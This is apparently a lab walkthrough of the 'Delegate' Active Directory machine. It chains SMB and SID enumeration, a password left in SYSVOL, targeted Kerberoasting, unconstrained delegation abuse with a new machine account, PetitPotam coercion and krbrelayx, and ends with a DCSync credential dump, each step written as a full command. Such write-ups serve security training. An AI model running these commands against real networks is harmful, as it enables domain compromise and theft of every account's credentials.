Delegate is a medium rated machine which consisted of enumerating smb shares to find credentials of a user which had GenericWrite
over a user object which was abused through Targeted Kerberoasting
, having SeEnableDelegation
privilege this lead to Unconstrained Delegation
and then performing DCsync.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
445/tcp open tcpwrapped
464/tcp open tcpwrapped
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Issuer: commonName=DC1.delegate.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-09-30T15:47:02
| Not valid after: 2024-03-31T15:47:02
| MD5: 3a340b861cd985281f509d995bef9f4a
|_SHA-1: ccc740dd30a643bfc26e0b7f5d018da28d7e1630
5985/tcp open
Enumerating smb with anonymous user doesn’t show any interesting shares
We can however enumerate domain users with lookupsid
using a guest account by brute forcing SIDs
lookupsid.py guest@delegate.vl 10000
Having the domain users, we can check if there’s any account having pre-authentication disabled which can lead to AS-REP roasting
Going back to shares and accessing SYSVOL
, we can find users.bat
file having a password
Spraying this password on the users we have confirms that this password belongs A.Briggs
Running python-bloodhound
to enumerate the domain
python3 bloodhound.py -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123' -c all -ns 10.10.70.255
From bloodhound we can see A.Briggs
has GenericWrite
on N.thompson
This can abuse either through Shadow credentials
or associating a SPN to N.Thompson for Targeted kerberoasting
, I tried to add shadow credentials by editing msDS-KeyCredentialLink
but due to PKINT not being supported by DC it didn't worked
Attempting to perform targeted kerberoasting
python3 /opt/targetedKerberoast/targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
Cracking the hash with hashcat
Since N.Thompson has CanPSRemote
we can login through WinRM
This user belongs to Delegation Admins
but there wasn't ACLs on bloodhound for that group
Checking privileges of this user shows that it has SeEnableDelegationPrivilege
enabled
This means that we can abuse unconstrained delegation by creating machine account and append a SPN to it, before that we need to make sure if machine quota isn’t 0
First creating a machine account with addcomputer.py
addcomputer.py -dc-ip 10.10.70.255 -computer-pass TestPassword321 -computer-name UwU delegate.vl/N.Thompson:'KALEB_2341'
Adding DNS record for the machine account we created
python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.0.136 --action add DC1.delegate.vl -dns-ip 10.10.70.255
To abuse unconstrained delegation the machine account needs to have a SPN and TRUSTED_FOR_DELEGATION
UAC, using bloodyAD
we can add the UAC
python3 /opt/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
Appending SPN with addspn
via msDS-AdditionalDnsHostName
python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.vl --additional
python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.v
Now running krbrelayx
first by coercing authentication (using any poc i.e petipotam, printerbug, dfscoerce ) from DC1 to our added machine with unconstrained delegation enabled, this will grab the copy of DC1’s TGT which gets stored in the memory of machine account h for the purpose of accessing resources which can be abused to perform DCsync
python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.85.247
python3 ./krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC
Having the ticket, we can export it and perform dcsync hashes with secretsdump
secretsdump.py 'DC1$'@DC1.delegate.vl -k -no-pass
References
- https://www.thehacker.recipes/a-d/movement/dacl/targeted-kerberoasting
- https://exploit.ph/user-constrained-delegation.html
- https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
- https://github.com/CravateRouge/bloodyAD
- https://medium.com/r3d-buck3t/attacking-kerberos-unconstrained-delegation-ef77e1fb7203